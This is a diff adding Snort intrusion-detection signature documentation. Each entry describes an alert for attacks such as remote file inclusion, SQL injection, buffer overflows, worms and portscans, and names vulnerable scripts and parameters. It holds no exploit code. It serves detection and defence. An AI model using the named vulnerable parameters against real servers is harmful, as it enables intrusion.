+and the subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+This event is generated when excess data is detected in an IMAP command.
+Some IMAP implementations exhibit programming errors that can lead to a
+buffer overflow condition when excess data is supplied to a static
+buffer.
+
+A vulnerability exists in the way that the Mercury Mail IMAP service
+handles several commands.  An excessively long command argument can
+trigger a denial of service or a buffer overflow and the subsequent
+execution of arbitrary code on a vulnerable server.
+
+--
+Affected Systems:
+	Pegasus Mail Mercury Mail Transport System 3.32
+	Pegasus Mail Mercury Mail Transport System 4.01a
+
+--
+Attack Scenarios:
+An attacker can supplied an overly long command, causing denial of
+service or a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell<bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1346.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+1341
+
+--
+Summary:
+Attempted gpp command access via web
+
+--
+Impact:
+Attempt to compile a binary on a host.
+
+--
+Detailed Information:
+This is an attempt to compiile a C or C++ source on a host. The gpp command is the GNU project's C and C++ compiler used to compile C and C++ source files into executable binary files. The attacker could possibly compile a program needed for other attacks on the system or install a binary program of his choosing.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains 'gpp'in the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. This command may also be requested on a command line should the attacker gain access to the machine. Whenever possible, sensitive files and certain areas of the filesystem should have the system immutable flag set to prevent files from being added to the host. On BSD derived systems, setting the systems runtime securelevel also prevents the securelevel from being changed. (note: the securelevel can only be increased).
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1342
+sid: 1343
+sid: 1344
+sid: 1345
+sid: 1346
+sid: 1347
+sid: 1348
+
+--
--- /dev/null
+++ b/doc/signatures/100000676.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000676
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Harpia" application running on a webserver. 
+Access to the file "missing.php" using a remote file being passed as the 
+"header_prog" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "header_prog" parameter in the "missing.php" script used 
+by the "Harpia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Harpia
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1469.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1469
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2448.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2448
+
+--
+Summary:
+This event is generated when an attempt is made to access the file
+setinfo.hts on a machine using HP Web JetAdmin.
+--
+Impact:
+Remote execution of arbitrary code.
+
+--
+Detailed Information:
+HP Web JetAdmin is software used to remotely manage HP networked
+peripheral devices. It may also be used to manage non-HP products also.
+It may be possible for a remote user to execute code of their choosing
+using the web interface.
+
+This is due to insufficient checking of user supplied input in the file
+setinfo.hts.
+
+--
+Affected Systems:
+	HP Web JetAdmin 7.5
+
+--
+Attack Scenarios:
+An attacker can supply any code of their choosing directly to the script
+in question and manipulate any device being managed by the software.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References
+
+--
--- /dev/null
+++ b/doc/signatures/100000773.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000773
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Blog CMS" application running on a webserver. Access to the file "index.php" with SQL commands being passed as the "archives" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "archives" parameter in the "index.php" script used by the "Blog CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Blog CMS
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000349.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000349
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ezupload Pro" application running on a webserver. Access to the file "initialize.php" using a remote file being passed as the "path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "path" parameter in the "initialize.php" script used by the "Ezupload Pro" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ezupload Pro
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/3401.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3401
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3391.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3391
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1703.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1703
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2269.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2269
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in versions of Sendmail.
+
+--
+Impact:
+Remote arbitrary code execution.
+
+--
+Detailed Information:
+A vulnerability exists in the prescan() function used in Sendmail prior
+to version 8.12.9. This function contains an error when converting a
+character to an integer value while processing SMTP headers.
+
+--
+Affected Systems:
+All systems using Sendmail.
+
+--
+Attack Scenarios:
+An attacker could exploit this condition to process code of their
+choosing and open a listening shell bound to a high port, thus opening the
+system to further compromise.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade Sendmail to the latest non-affected verison.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2003-07.html
+
+--
--- /dev/null
+++ b/doc/signatures/2003.txt
@@ -0,0 +1,79 @@
+Rule:  
+
+--
+Sid:
+2003
+
+--
+Summary:
+
+This event is generated when an attempt is made by the "Slammer" worm to compromise a Microsoft SQL Server.
+
+--
+Impact:
+A worm targeting a vulnerability in the MS SQL Server 2000 Resolution 
+Service was released on January 25th, 2003.  The worm attempts to 
+exploit a buffer overflow in the Resolution Service.  Because of the 
+nature of the vulnerability, the worm is able to attempt to compromise 
+other machines very rapidly.
+
+--
+Detailed Information:
+The Monitor Service provided by MS SQL and MSDE uses unchecked client
+provided data in an SQL version check function.
+
+The worm attempts to exploit a buffer overflow in this version request.
+If the worm sends too many bytes in the request that triggers the 
+version check, then a buffer overflow condition is triggered resulting 
+in a potential compromise of the SQL Server.
+
+--
+Affected Systems:
+This vulnerability is present in unpatched MS SQL Servers.  The following unpatched services containing MS SQL or Microsoft Desktop Engine (MSDE) may potentially be compromised by this worm:
+
+* SQL Server 2000 (Developer, Standard, and Enterprise Editions)
+* Visual Studio .NET (Architect, Developer, and Professional Editions)
+* ASP.NET Web Matrix Tool
+* Office XP Developer Edition
+* MSDN Universal and Enterprise subscriptions
+
+--
+Attack Scenarios:
+This is worm activity.
+
+--
+Ease of Attack:
+Exploits for this vulnerability have been publicly published.
+
+A worm has been written that automatically exploits this vulnerability.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+Block external access to the MS SQL services on port 1433 and 1434 if 
+possible.
+
+Patches from Microsoft are available that fix this vulnerability.  The 
+patches are available from
+
+www.microsoft.com/technet/security/bulletin/MS02-039.asp
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1407.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1407
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/122-19.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-19
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a udp
+portsweep was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
--- /dev/null
+++ b/doc/signatures/2585.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2585
+
+--
+Summary:
+This event is generated when an attempt is made to probe for a known 
+vulnerability on a web server or a web application resident on a web
+server using Nessus.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to ascertain wether or
+not a Web server or an application running on a web server is subject
+to a possible vulnerability using the tool Nessus.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+An attacker merely needs to use Nessus against a server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1876.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1876
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/122-5.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-5
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a tcp
+filtered portscan was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
--- /dev/null
+++ b/doc/signatures/1582.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1582
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3017.txt
@@ -0,0 +1,68 @@
+Rule: 
+
+--
+Sid: 
+3017
+
+-- 
+Summary: 
+An oversized request was sent to a WINS server.
+
+-- 
+Impact: 
+Client-supplied data is written to client-specified locations in memory,
+allowing for arbitrary code execution. Since WINS servers run with
+administrative privileges, this allows an attacker to gain
+administrative access remotely without any prior authentication.
+
+--
+Detailed Information:
+Vulnerable WINS servers write client-supplied data to a client-supplied
+memory address. This allows clients to supply arbitrary code for
+execution with administrative privileges. This attack does not require authentication.
+
+In order to reduce false positives, the rule looks for requests that are
+greater than 204 bytes. As the maximum length of a hostname is 192
+bytes, and a standard request has 12 bytes of headers, no standard
+request should exceed this length. Additionally, this rule checks to see
+if particular flags that are required to exploit this vulnerability are
+set in the client request.
+
+--
+Affected Systems:
+Microsoft Windows servers running the WINS service.
+
+--
+Attack Scenarios: 
+Since WINS clients are programmed to not exceed the maximum length for a
+request, an attacker would need to use a script which generated
+malformed WINS requests.
+
+-- 
+Ease of Attack: 
+Simple; exploits exist.
+
+-- 
+False Positives:
+This rule will generate false positives when replication occurs.
+Additionally, there may be unknown scenarios which generate false positives.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+See the Microsoft Knowledge Base article referenced below.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+http://support.microsoft.com/kb/890710
+
+--
--- /dev/null
+++ b/doc/signatures/846.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+846
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000126.txt
@@ -0,0 +1,62 @@
+Rule: 
+
+--
+Sid: 
+100000126
+
+-- 
+Summary: 
+This event is generated when an attempt is made to overflow a buffer in the 
+GoodTech Telenet server.
+
+-- 
+
+Impact: 
+The affected server will be crashed, and remote code execution with the 
